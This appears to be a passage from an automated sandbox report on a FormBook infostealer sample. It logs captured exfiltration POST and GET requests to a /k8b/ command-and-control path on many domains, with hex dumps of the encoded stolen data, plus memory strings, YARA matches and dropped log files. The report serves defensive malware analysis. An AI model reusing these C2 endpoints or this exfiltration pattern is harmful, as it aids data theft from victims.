75 6d 6f 59 48 61 56 7a 69 4f 35 76 62 46 46 71 69 4e 65 4d 33 57 73 62 56 48 52 51 6b 32 52 32 43 36 73 32 36 31 71 49 72 46 5f 4d 63 54 76 78 57 4f 4c 6d 57 36 73 75 4d 78 4a 75 64 6c 30 62 6d 38 75 45 50 73 70 42 50 78 4e 56 61 4c 51 67 2d 38 34 68 57 54 48 32 6e 32 56 76 31 34 31 4f 49 54 57 4e 33 30 31 55 51 28 6e 35 34 45 50 31 4b 43 48 5a 5a 35 65 75 67 41 64 54 69 74 34 70 62 75 73 7e 53 76 62 4b 69 6d 77 6f 73 33 48 31 74 38 43 43 77 7e 41 44 6e 33 35 33 38 63 63 31 66 7e 33 79 4f 4d 64 28 71 30 47 33 75 56 7a 39 47 4e 6e 68 51 52 4f 31 6e 70 73 61 66 46 4f 56 6c 5a 52 36 7a 4b 48 73 67 58 68 51 6f 43 47 34 5f 46 69 55 6c 68 6e 57 74 6c 31 6d 69 56 6b 49 5a 6b 31 4f 41 29 2e 00 6a 4b 6a 4d 4c 68 7a Data Ascii: abg0n=~CMTWAyWsr(p3D4r7zkBcRbhwORoaYjrPp5jZtp_jutpz3qdUu6fzgPdwN5jJrx0A7kQKGKpFYAH1A(BPaNiE6qnUKrmXzZeub9KHANqK_eKEmbVSKdo68yQX2zkMDCfshfL8DZrHRxASAJ6aTNxHt~xUHbzdhBZY0U6I-jxp_7BxumoYHaVziO5vbFFqiNeM3WsbVHRQk2R2C6s261qIrF_McTvxWOLmW6suMxJudl0bm8uEPspBPxNVaLQg-84hWTH2n2Vv141OITWN301UQ(n54EP1KCHZZ5eugAdTit4pbus~SvbKimwos3H1t8CCw~ADn3538cc1f~3yOMd(q0G3uVz9GNnhQRO1npsafFOVlZR6zKHsgXhQoCG4_FiUlhnWtl1miVkIZk1OA).jKjMLhz
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.7sat.asiaConnection: closeContent-Length: 185371Cache-Control: no-cacheOrigin: http://www.7sat.asiaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.7sat.asia/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 7e 43 4d 54 57 46 57 6b 75 62 37 34 79 78 63 75 36 6a 55 5a 4c 41 72 33 30 4d 55 73 55 66 76 5f 51 72 39 6f 5a 73 5a 37 6f 50 39 5f 69 6d 61 64 63 4c 57 53 6f 77 50 61 6b 39 35 38 59 62 39 6d 4a 4c 63 49 4b 48 50 45 46 59 5a 52 73 56 7a 45 49 4b 4d 6b 46 61 6e 63 64 71 28 48 58 31 5a 6e 76 35 51 4d 41 41 52 71 58 37 36 49 4c 6e 4c 43 58 4a 4a 72 33 73 75 56 56 33 4c 35 4c 7a 76 6f 74 48 58 39 37 44 70 70 51 54 74 31 64 6b 30 30 65 43 56 45 4a 64 71 32 49 57 50 65 5a 41 63 51 66 77 4a 5a 4e 5f 6a 32 71 50 6a 50 30 73 4f 57 63 32 75 47 32 7a 7e 4c 76 61 4d 77 6b 30 6c 50 48 55 69 6b 5a 6b 4c 37 61 32 61 58 71 42 6a 76 79 34 74 59 4b 72 31 51 46 5f 48 77 6e 57 69 43 71 31 53 38 77 5a 51 33 6f 70 39 6f 50 6b 56 58 48 63 41 78 65 2d 42 69 62 35 37 48 75 4e 6c 33 67 55 28 31 34 6e 32 2d 69 56 34 35 58 35 7a 69 48 6b 59 45 45 41 75 48 6e 70 64 46 31 65 79 59 61 66 78 43 7a 53 67 32 41 43 67 35 6a 4f 6d 2d 39 41 44 42 4e 53 53 36 6b 4d 32 46 31 72 49 4a 43 77 7e 45 44 6d 32 57 32 4f 67 63 36 71 79 43 79 76 4d 72 76 61 30 68 35 65 46 31 30 55 5a 33 68 51 4a 4f 32 7a 74 47 56 49 35 4f 47 47 42 4f 36 53 4b 48 72 51 58 68 63 49 43 52 38 39 5a 73 65 44 5a 70 66 66 51 6b 35 68 49 72 4b 4b 45 36 59 69 6e 67 4b 61 61 47 4e 66 31 4e 52 6a 36 4a 69 54 7a 7a 52 32 6e 70 48 4e 58 61 35 75 6c 6f 70 47 43 6c 70 52 4d 6b 6a 4e 77 55 5a 2d 63 6b 52 53 57 6a 34 6b 66 33 54 6b 66 39 79 4a 47 44 33 73 77 76 51 73 67 69 56 77 6f 62 73 43 6f 57 58 6a 65 4f 68 7a 28 55 31 73 6e 55 51 4e 44 6a 45 53 5a 75 7e 46 62 7a 57 34 78 77 36 63 4d 5a 79 78 46 70 36 79 30 6c 4c 63 6f 50 37 67 43 73 73 38 39 32 64 7a 52 53 59 46 6a 36 39 61 59 66 70 70 78 36 32 75 39 37 32 6f 4b 78 67 76 47 64 50 50 78 77 37 4d 76 58 4d 49 33 45 7e 45 56 4f 63 30 73 43 4f 33 28 33 69 4e 53 33 57 68 74 54 7a 62 32 74 34 44 38 74 71 62 28 49 48 68 33 75 54 49 73 69 7e 74 41 33 77 57 52 46 78 54 69 47 37 5a 32 78 43 54 65 7a 69 64 6c 4d 63 45 46 78 37 53 7e 73 7e 35 4f 67 4f 44 4c 43 72 4a 62 53 65 7a 32 32 74 58 41 77 67 6e 7e 71 68 45 6e 71 48 5a 4e 78 34 36 32 61 46 52 6a 45 64 74 75 74 71 64 38 70 34 38 4b 77 69 34 74 30 61 7a 41 72 69 36 64 66 28 54 69 33 6b 5f 72 45 66 50 69 2d 32 51 6f 34 70 76 69 37 58 7a 4d 36 35 58 79 36 71 55 56 38 28 69 39 66 52 4b 65 66 28 39 39 6c 76 4e 48 6f 32 69 4f 4f 4a 52 31 57 33 34 7a 4a 41 39 50 70 69 63 44 4c 55 73 44 38 57 4d 6e 70 47 79 68 50 72 30 68 67 44 4f 65 31 68 46 6e 65 70 43 56 55 6f 7a 78 6d 78 57 68 50 62 44 32 6c 61 4c 49 65 74 4f 4a 38 28 51 66 6e 39 59 71 70 76 67 6e 78 6c 6b 4c 52 33 48 63 34 6a 6f 66 43 43 79 7a 34 76 70 44 49 45 69 4a 41 4c 67 6b 5
          Source: global trafficHTTP traffic detected: GET /k8b/?abg0n=0v5M9lAxeGs3Z2wSqhBRyQiK1iT/MtB56uN4ob1ruqxgc5JDlvFtl3BValt9kiEa9zMj&mVJl9j=h2Jdsdr8W25Tg0Np HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?mVJl9j=h2Jdsdr8W25Tg0Np&abg0n=6dMkGDfpk1r0Gmr8hQYTBKv4S6+5Z6uHlrQcjV8Ea1YOfXcWOZvOwazRs+Dk1aCo4f0j HTTP/1.1Host: www.westhillsterracepdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?mVJl9j=h2Jdsdr8W25Tg0Np&abg0n=2gApIl2Au4n1uRFWrzVZLEXy//w6Ybr6Vv4mKuths8NfzmG+Z+iGg3adnddbL4twR+EY HTTP/1.1Host: www.7sat.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.therbalfoodinv.com
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.messi-and-ronaldo.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.messi-and-ronaldo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.messi-and-ronaldo.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 67 30 6e 3d 38 4e 31 32 6a 41 63 51 54 47 41 43 41 6e 39 53 77 47 63 55 6c 6d 53 32 32 44 69 73 4a 50 5a 65 74 4a 63 71 35 5a 59 31 76 49 4e 4b 59 4b 6c 68 6c 50 41 45 67 53 45 34 5a 45 52 62 30 69 41 66 68 44 4d 79 30 79 69 53 31 68 57 64 69 42 5a 38 59 73 74 52 70 69 6d 42 66 4d 44 44 38 42 52 4d 77 4c 55 44 47 78 62 4a 31 5a 71 56 74 32 36 65 59 43 53 39 43 74 4e 76 37 4a 41 35 76 49 39 49 70 41 76 4d 73 31 34 63 6c 32 57 51 4d 67 32 67 62 44 58 53 64 76 71 66 48 64 54 72 58 50 6d 39 4e 4f 6b 76 74 65 58 31 72 73 76 2d 65 35 39 4f 61 55 44 47 63 52 5a 4e 6c 6b 4a 72 4d 30 38 64 6b 48 75 68 6e 2d 28 6b 30 66 6c 4d 66 2d 42 6a 6e 30 70 30 4f 56 6d 74 78 6f 30 76 75 45 64 75 7a 2d 74 70 69 4b 7e 74 75 42 54 72 31 37 31 4c 53 6e 52 66 62 6a 64 6f 65 32 4a 4f 58 32 34 52 68 66 4b 54 4f 61 78 78 47 55 6d 68 71 56 48 5f 54 65 75 53 50 63 75 70 67 30 6a 65 52 2d 35 38 28 68 42 41 6a 73 37 74 31 5f 69 4b 4e 4c 28 5a 31 78 47 6f 6a 41 61 68 54 58 39 74 74 70 54 55 47 31 4a 30 42 36 35 74 67 31 53 6b 30 4b 35 6a 37 5f 4e 38 70 6a 5a 34 71 31 6d 44 63 2d 6f 6d 67 4b 66 66 64 65 42 51 70 75 42 50 56 6f 72 6a 5a 58 74 35 28 32 37 42 61 4a 6c 6f 70 49 47 49 70 57 4d 34 4f 75 53 72 73 4a 46 30 56 44 53 30 70 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abg0n=8N12jAcQTGACAn9SwGcUlmS22DisJPZetJcq5ZY1vINKYKlhlPAEgSE4ZERb0iAfhDMy0yiS1hWdiBZ8YstRpimBfMDD8BRMwLUDGxbJ1ZqVt26eYCS9CtNv7JA5vI9IpAvMs14cl2WQMg2gbDXSdvqfHdTrXPm9NOkvteX1rsv-e59OaUDGcRZNlkJrM08dkHuhn-(k0flMf-Bjn0p0OVmtxo0vuEduz-tpiK~tuBTr171LSnRfbjdoe2JOX24RhfKTOaxxGUmhqVH_TeuSPcupg0jeR-58(hBAjs7t1_iKNL(Z1xGojAahTX9ttpTUG1J0B65tg1Sk0K5j7_N8pjZ4q1mDc-omgKffdeBQpuBPVorjZXt5(27BaJlopIGIpWM4OuSrsJF0VDS0pg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 16 Sep 2020 13:03:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: HostAccept-Ranges: bytesData Raw: 35 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 73 73 69 2d 61 6e 64 2d 72 6f 6e 61 6c 64 6f 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200968047.0000000002DA0000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.7sat.asia
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.7sat.asia/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.7sat.asia/k8b/www.sasvisioninternational.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.7sat.asiaReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.citestaccnt1598634983.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.citestaccnt1598634983.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.citestaccnt1598634983.com/k8b/www.sfheli.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.citestaccnt1598634983.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.dekacoiffure.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.dekacoiffure.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.dekacoiffure.com/k8b/www.trophemus-treasure-hunters.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.dekacoiffure.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.etkensigorta.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.etkensigorta.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.etkensigorta.com/k8b/www.wintersmooncandleco.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.etkensigorta.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.exceptionalhospitals.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.exceptionalhospitals.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.exceptionalhospitals.com/k8b/www.dekacoiffure.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.exceptionalhospitals.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com/k8b/www.citestaccnt1598634983.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.localille.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.localille.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.localille.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.messi-and-ronaldo.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.messi-and-ronaldo.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.messi-and-ronaldo.com/k8b/www.westhillsterracepdx.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.messi-and-ronaldo.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.pbuckleyprojects.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.pbuckleyprojects.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.pbuckleyprojects.com/k8b/www.localille.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.pbuckleyprojects.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sasvisioninternational.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sasvisioninternational.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sasvisioninternational.com/k8b/www.exceptionalhospitals.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sasvisioninternational.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sfheli.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sfheli.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sfheli.com/k8b/www.pbuckleyprojects.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.sfheli.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.therbalfoodinv.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.therbalfoodinv.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.therbalfoodinv.com/k8b/www.messi-and-ronaldo.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.therbalfoodinv.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.trophemus-treasure-hunters.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.trophemus-treasure-hunters.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.trophemus-treasure-hunters.com/k8b/www.etkensigorta.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.trophemus-treasure-hunters.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.westhillsterracepdx.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.westhillsterracepdx.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.westhillsterracepdx.com/k8b/www.ytalmorales.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.westhillsterracepdx.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.wintersmooncandleco.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.wintersmooncandleco.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.wintersmooncandleco.com/k8b/www.glowtey.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.wintersmooncandleco.comReferer:
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.ytalmorales.com
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.ytalmorales.com/k8b/
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.ytalmorales.com/k8b/www.7sat.asia
          Source: explorer.exe, 00000006.00000003.288188485.0000000008072000.00000004.00000001.sdmpString found in binary or memory: http://www.ytalmorales.comReferer:
          Source: explorer.exe, 00000006.00000000.228223788.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: pZTgBSxb0oe9deC.exe, 00000000.00000002.200696225.0000000001289000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.244341859.0000000001320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.202381231.0000000004158000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.243339890.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.pZTgBSxb0oe9deC.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\O9541UQ2\O95logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\O9541UQ2\O95logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.244372940.0000000001350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
